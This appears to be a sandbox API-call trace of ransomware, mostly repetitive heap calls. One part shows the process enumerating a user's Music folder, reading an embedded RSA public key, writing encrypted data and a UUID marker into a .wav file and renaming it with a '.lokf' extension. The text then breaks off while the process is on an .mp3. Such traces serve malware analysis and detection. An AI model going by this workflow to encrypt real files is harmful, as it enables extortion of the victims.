RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.943] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.944] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.946] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.946] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\") returned="ULJQyyPz2Ie5aZRk\\" [0060.946] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\") returned="iCD5MmspTIMUES\\" [0060.947] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\") returned="m4--j\\" [0060.947] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0060.947] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.947] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.947] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.947] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.947] PathFindFileNameW (pszPath="") returned="" [0060.947] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb499f670, ftCreationTime.dwHighDateTime=0x1d4d143, ftLastAccessTime.dwLowDateTime=0xbcaeb4a0, ftLastAccessTime.dwHighDateTime=0x1d4ca44, ftLastWriteTime.dwLowDateTime=0xbcaeb4a0, ftLastWriteTime.dwHighDateTime=0x1d4ca44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.947] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.947] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb499f670, ftCreationTime.dwHighDateTime=0x1d4d143, ftLastAccessTime.dwLowDateTime=0xbcaeb4a0, ftLastAccessTime.dwHighDateTime=0x1d4ca44, ftLastWriteTime.dwLowDateTime=0xbcaeb4a0, ftLastWriteTime.dwHighDateTime=0x1d4ca44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.947] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6b37910, ftCreationTime.dwHighDateTime=0x1d4c560, ftLastAccessTime.dwLowDateTime=0x73e8e310, ftLastAccessTime.dwHighDateTime=0x1d4c89d, ftLastWriteTime.dwLowDateTime=0x73e8e310, ftLastWriteTime.dwHighDateTime=0x1d4c89d, nFileSizeHigh=0x0, nFileSizeLow=0x5ac5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2ZFt4M6QcsQkL8.wav", cAlternateFileName="2ZFT4M~1.WAV")) returned 1 [0060.947] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\2ZFt4M6QcsQkL8.wav") returned=".wav" [0060.947] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\2ZFt4M6QcsQkL8.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\uljqyypz2ie5azrk\\2zft4m6qcsqkl8.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.947] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=23237) returned 1 [0060.947] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.950] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5a9f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.950] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.951] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x5ac5, lpOverlapped=0x0) returned 1 [0060.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.951] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.951] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.952] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.952] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.952] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.952] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.952] GetLastError () returned 0x0 [0060.952] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.952] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.952] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.952] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.952] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.952] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.952] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.953] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.953] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5ac5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.953] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.953] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.953] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.953] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.953] CloseHandle (hObject=0x5cc) returned 1 [0060.954] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228c60 [0060.954] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8d0) returned 0x3268798 [0060.954] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.954] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\2ZFt4M6QcsQkL8.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\uljqyypz2ie5azrk\\2zft4m6qcsqkl8.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\2ZFt4M6QcsQkL8.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\uljqyypz2ie5azrk\\2zft4m6qcsqkl8.wav.lokf")) returned 1 [0060.955] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.955] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.955] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.956] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.956] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8fa9e0, ftCreationTime.dwHighDateTime=0x1d4c8b6, ftLastAccessTime.dwLowDateTime=0x33217810, ftLastAccessTime.dwHighDateTime=0x1d4c938, ftLastWriteTime.dwLowDateTime=0x33217810, ftLastWriteTime.dwHighDateTime=0x1d4c938, nFileSizeHigh=0x0, nFileSizeLow=0x126b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gnUl.mp3", cAlternateFileName="")) returned 1 [0060.956] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.956] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.956] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.956] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\gnUl.mp3") returned=".mp3" [0060.956] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\gnUl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\uljqyypz2ie5azrk\\gnul.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.956] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=75441) returned 1 [0060.957] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.959] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1268b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.959] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.960] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.960] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.960] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.960] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x126b1, lpOverlapped=0x0) returned 1 [0060.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.960] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.960] lstrlenA (lpString="-----BEGIN PUBLIC 